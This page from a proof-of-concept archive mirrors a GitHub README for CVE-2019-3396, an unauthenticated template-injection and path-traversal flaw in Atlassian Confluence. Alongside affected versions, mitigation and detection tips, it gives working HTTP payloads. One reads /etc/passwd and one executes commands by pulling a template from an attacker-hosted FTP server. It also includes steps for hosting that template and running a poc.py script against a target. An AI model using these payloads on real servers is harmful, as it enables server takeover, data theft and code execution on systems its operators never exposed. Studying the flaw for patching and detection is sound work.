Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2019-3396 PoC — Atlassian Confluence Server 路径遍历漏洞

Source
https://github.com/kh4sh3i/CVE-2019-3396
Associated Vulnerability
Title:Atlassian Confluence Server 路径遍历漏洞 (CVE-2019-3396)
Description:The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Description
CVE-2019-3396 confluence SSTI RCE
Readme
# CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE

## 🔎 What is CVE-2019-3396?

* A **critical Confluence bug** (Atlassian).
* Type: **Template Injection + Path Traversal**.
* Risk: **Remote Code Execution (RCE)** without login.
* Status: **Exploited in the wild**.

---

## 🛑 Affected Versions

* **6.6.0 → 6.6.11** ❌ vulnerable
* **6.6.12** ✅ fixed
* **6.12.0 → 6.12.2** ❌ vulnerable
* **6.12.3** ✅ fixed
* **6.13.0 → 6.13.2** ❌ vulnerable
* **6.13.3** ✅ fixed
* **6.14.0 → 6.14.1** ❌ vulnerable
* **6.14.2** ✅ fixed

👉 Always check Atlassian’s official advisory for full details.

---

## 💥 Impact

* Full **server takeover**
* **Data theft**, ransomware, crypto-miners
* Attackers can run **any code they want**

---

## 🔐 Mitigation

* ✅ **Upgrade** to patched Confluence version (best fix)
* 🚫 Disable **Widget Connector** macro if you can’t patch right away
* 🔒 Limit access (internal only until fixed)

---

## 👀 Detection (safe tips)

* Watch logs for strange requests hitting macro/preview endpoints
* Look for weird processes or outbound traffic
* Use vulnerability scanners to confirm version

---

## 📂  Read File
```
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}

{"macro":{"params":{"_template":"file:///etc/passwd"}}}
```

<img src="img/1.png" >


## Execute Command 
```
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***

{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
```

## Automation 
* upload cmd.vm on your vps
* use ftp or https for create likn to this cmd.vm file via
 ```
pip install pyftpdlib
python -m pyftpdlib -p  8888
```
* update file poc.py with new value for pyftp = "ftp://10.100.10.100:8888/cmd.vm"

```
python poc.py <url> <cmd>
python poc.py https://ip:port  "id"
```


⚠️ **TIP** — this repo is only for **education, defense, and awareness**.

---

## 🔗 References

* [Atlassian Advisory](https://confluence.atlassian.com/security) 🏢
* [NVD Entry for CVE-2019-3396](https://nvd.nist.gov/vuln/detail/CVE-2019-3396) 🛡️
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →